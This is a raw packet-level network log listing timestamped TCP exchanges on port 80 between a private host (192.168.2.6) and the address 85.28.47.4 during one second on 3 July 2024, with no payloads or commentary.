Jul 3, 2024 18:08:39.336473942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.336498022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.336962938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336975098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336987019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336997986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337007046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337008953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337022066 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337022066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337035894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337047100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337054968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337059021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337074995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337090015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337801933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337820053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337831974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337856054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337865114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337868929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337881088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337893009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337898970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337904930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337915897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337917089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337929010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337937117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337939024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337950945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337965012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337971926 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337975979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.337990999 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.337994099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338005066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338017941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338018894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338030100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338040113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338047028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338066101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338069916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338077068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338088989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338099003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338102102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338112116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338121891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338130951 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338134050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338145018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338162899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338171005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338181973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338181973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338192940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338203907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338205099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338217020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338227987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338231087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338239908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338249922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338260889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338268042 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338272095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338282108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338284969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338295937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338306904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338313103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338318110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338350058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338365078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338654995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338665962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338679075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338690042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338697910 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338705063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338722944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338748932 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338799000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338813066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338824034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338835955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338844061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338846922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338860035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338860035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338871002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338881969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338892937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338903904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338915110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338922024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.338926077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.338958979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339010000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339540958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339551926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339564085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339575052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339582920 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339596987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339605093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339607954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339620113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339624882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339628935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339639902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339648962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339658976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339668036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339669943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339680910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339692116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339695930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339703083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339715004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339726925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339728117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339739084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.339751005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.339772940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.340101957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340112925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340125084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340136051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340156078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.340157032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340163946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.340168953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340179920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340189934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340193033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.340214014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340224981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.340228081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.340245962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.340277910 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.424627066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.424674034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.424685001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.424748898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.424823999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.424834967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.424845934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.424851894 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.424870968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.424896955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425009966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425055027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425060987 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425065041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425090075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425107002 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425237894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425250053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425261974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425272942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425283909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425291061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425307035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425334930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425416946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425426960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425438881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425452948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425456047 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425467014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425477982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425478935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425488949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425504923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425534010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425792933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425803900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425816059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425827026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425837994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425841093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425848961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425860882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425863981 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425873041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425879955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425884008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.425904036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.425925016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426086903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426100016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426111937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426124096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426135063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426135063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426146030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426156998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426160097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426167965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426179886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426187038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426191092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426203966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426230907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426594019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426604033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426615953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426628113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426637888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426640034 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426671028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426803112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426819086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426829100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426841021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426848888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426851034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426861048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426865101 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426873922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426883936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426892996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426894903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426906109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426917076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426918030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426928043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426937103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426939011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426949978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426954031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426963091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426974058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.426983118 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.426985979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427011967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427026033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427319050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427330017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427340984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427351952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427365065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427388906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427458048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427469015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427479029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427491903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427500963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427501917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427512884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427520990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427525043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427536964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427546978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427552938 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427558899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427568913 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427576065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427586079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427587032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427598000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427608967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427608967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427620888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427632093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427634954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427644014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427654982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427660942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427666903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427676916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427678108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.427695990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.427721024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428461075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428473949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428497076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428508043 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428514004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428525925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428534985 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428536892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428548098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428559065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428566933 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428570032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428580999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428585052 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428591967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428602934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428608894 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428613901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428625107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428626060 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428634882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428642988 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428647041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428657055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428668976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428674936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428679943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428690910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428699970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428703070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428714037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428723097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428723097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.428740978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.428771973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.513411045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513475895 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.513624907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513637066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513660908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513665915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.513673067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513684034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513690948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.513695955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513708115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513715029 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.513720036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513760090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.513794899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513807058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513818979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513830900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.513834000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.513842106 CEST	80	49710	85.28.47.4	192.168.2.6
